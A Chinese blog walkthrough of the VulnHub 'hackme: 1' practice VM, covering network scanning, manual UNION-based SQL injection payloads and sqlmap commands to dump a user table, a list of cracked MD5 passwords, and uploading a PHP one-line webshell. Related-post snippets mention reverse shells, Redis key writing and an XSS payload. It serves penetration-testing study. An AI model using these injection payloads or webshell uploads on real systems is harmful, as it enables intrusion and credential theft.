hackme 靶场复现

最新推荐文章于 2024-06-14 08:30:00 发布
最新推荐文章于 2024-06-14 08:30:00 发布
阅读量284 收藏 1
点赞数 2
文章标签: 网络安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68471358/article/details/132070576
版权

一.靶场介绍

  1. 靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/
  2. 将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机
  3. 将两台虚拟机均设为桥接模式

二.靶机渗透

1.主机发现 查看同一网段的所有IP,寻找靶机的IP地址,发现靶机IP为192.168.182.181

查看靶机ip

方法一:

a.将kali和靶机都设置为nat模式,查看网段(我的是192.168.182.0)

b.这里要先查看靶机的mac地址

c.用nmap扫描在kali里输入nmap -sV 192.168.182.0/24,扫描靶机,查看ip

方法二:

在kali使用命令 arp-scan -l

2.对靶机进行端口扫描,发现开放80和22端口

nmap 192.168.182.181

3.通过dirb http://192.168.182.181命令查看80端口的详细目录,发现目录为upload

三.渗透流程

SQL注入

手工注入

1.登录主页发现登陆页面,并且可以注册用户

2.点击 Sign up now 注册用户zxczxc 密码zxczxc

3.登录zxczxc用户,点击search可以查看全部

4.验证sql注入 Windows OS' and 1=1# (这边输入的内容只要是这十五个数据中的其中一个就可以了)然后就是

Windows OS' and 1=2#

5.判断字段数 Windows OS' order by 3# 页面回显正常,说明字段数是3

6.查看回显位置 -1' union select 1,2,3#

7.查看库名 -1' union select database(),user(),3#

8.查看表名 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

9.查看字段名 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

10.查看表中user,password字段数据 -1' union select group_concat(user),group_concat(pasword),3 from users#

 

11.将密码进行MD5解密

以此类推,将所有密码解密

user1,	        5d41402abc4b2a76b9719d911017c592		hello
user2,	        6269c4f71a55b24bad0f0267d9be5508		commando
user3,	        0f359740bd1cda994f8b55330c86d845		p@ssw0rd
test,	        05a671c66aefea124cc08b76ea6d30bb		testtest
superadmin,     2386acb2cf356944177746fc92523983                Uncrackable            
test1,		05a671c66aefea124cc08b76ea6d30bb                testtest
zxczxc		ecb97ffafc1798cd2f67fcbc37226761                zxczxc

工具注入

将请求包中内容复制到与工具同目录下的txt文件中

库名:python3 sqlmap.py -r 1.txt --dbs --batch

表以及数据:python3 sqlmap.py -r 1.txt -D webapphacking --dump --batch

四.文件上传

1.使用superadmin用户登录 密码:Uncrackable 发现文件上传点

2.上传phpinfo()进行验证

先试试直接上传php文件

发现可以直接解析

该上传点存在文件上传漏洞

3.尝试上传一句话木马

页面空白,说明木马上传成功

4.使用中国蚁剑链接 !注意一句话木马的密码应和蚁剑连接时保持一致

重楼学网安
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
记录一次vulhub:hackme2-DHCP靶场复现
sszsNo1的博客
06-24 103
复现vulhub中的hackme2-DHCP靶场,最后拿下shell
HACKME:1靶机
JKding123的博客
10-22 933
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1758
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后网卡最好重新配下,不然容易报网卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
vulnhub靶机:hackme
最新发布
weixin_68416970的博客
06-14 536
猜测superadmin用户是管理员,登录一下试试。存在SQL注入,使用sqlmap工具注入后面的。发现靶机IP是192.168.109.132。登录主页发现登录页面,而且还可以注册用户。从响应数据包可以看出来已经上传到文件夹了。创建用户admin,密码123456。使用dirsearch工具扫描目录。创建完成后登录admin用户。设置网络模式为net模式。发现开放了22、80端口。将得到的密码用md5解密。访问目录扫描出来的路径。发现是一个文件上传页面。复制图片链接用蚁剑连接。发现存在文件上传漏洞。
redis未授权访问漏洞【vulhub靶场复现
m0_55854679的博客
08-01 774
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹
靶场-hackeme1
weixin_58602402的博客
06-12 140
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
GROTESQUE靶场复现
05-05
### GROTESQUE靶场复现知识点解析 #### 一、网络侦察技术 - **ARP扫描**:在渗透测试过程中,ARP(Address Resolution Protocol)扫描是一种常用的技术手段,用于探测同一局域网内的活跃主机。这里的目标是找到...
uploadlabs靶场文件
02-27
这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。 【描述】:该靶场是基于PHPStudy的LAMP(Linux、Apache、MySQL、PHP)环境搭建的。"www"目录是Apache服务器默认...
开源靶场zsbdzsbd
04-19
【开源靶场zsbdzsbd】是一个专注于网络安全的开源项目,其主要目的是为网络安全爱好者、学生和专业人士提供一个实践和学习网络安全技能的平台。在这个靶场中,你可以找到各种模拟真实网络环境中存在的漏洞,通过实战...
详解 Vulhub 靶场搭建
06-12
手把手教你vulhub搭建命令和过程
hackme靶场练习
SYJ_361的博客
03-18 2090
本文对hackme靶场进行练习,运用sql注入漏洞,以及msf木马反弹shell,进而取得root权限
Vulnhub靶机练习:hackme 1
WhiteCatNya的博客
01-29 137
发现是一个登录页面,还可以注册账户,这里盲测一波SQL注入,没有发现,选择了注册一个账户进入里面看看是什么情况。直接点击search按钮可以显示下面这么多书籍,依据已经存在的书籍进行测试sql注入。一个一个在登录解密尝试,最后确定了superadmin:Uncrackable。登录之后发现存在一个上传点,经过几次上传发现可以上传任何文件。开启80端口,按照描述,在web页面寻找可用信息。反弹shell,并去查看该二进制文件作用。发现存在sql注入,基于单引号。在这个目录发现了一个二进制文件。
hackme靶场通关
weixin_56594114的博客
08-02 65
模式子网地址,靶机需要也设置成。显示结果,说明闭合方式是'去扫描全网段查看靶机的。
HACKME-1 打靶
weixin_57315671的博客
06-16 215
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
hackme2-dhcp靶场记录
lionwerson的博客
10-10 1272
1.下载靶场 下载地址 2.打开虚拟机,导入虚拟机后把网络模式由NAT改为桥接模式,启动。 先用浏览器访问一下80端口,是一个登录,没有验证码,可以试一下爆破。我这里还是先注册一下,不行再爆破。 可以注册,注册登录之后发现这是一个图书系统。 搜索一下试试,显示了所有的图书。 但凡有搜索的地方,先试一下sql注入,抓包看一下,post有search参数,手工测试一下。 search存注入,字符型。联合注入一下,试一下字段数。 没有注入成功,盲...
hackme2靶场刷题记录
qq_53755216的博客
07-28 405
写在前面 最近看到貌似有些靶机挺好玩的 下了个靶机来玩一下 nmap扫一下端口 扫到了 直接进入 渗透开始! 猜测 search 有sql注入 sqlmap简单梭以下 没啥反应。。。 回到登录框 看看这边有没有什么搞头 直接bp扫描器一开 直接扫出了一个xss是我没想到的 payload username=admint807c%22%3e%3cscript%3ealert(1)%3c%2fscript%3eoqu8p&password=password <!DOCTYPE html&g
vulhub靶场学习日记hackme2
m0_55763479的博客
07-12 315
vulhub靶场学习日记hackme2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值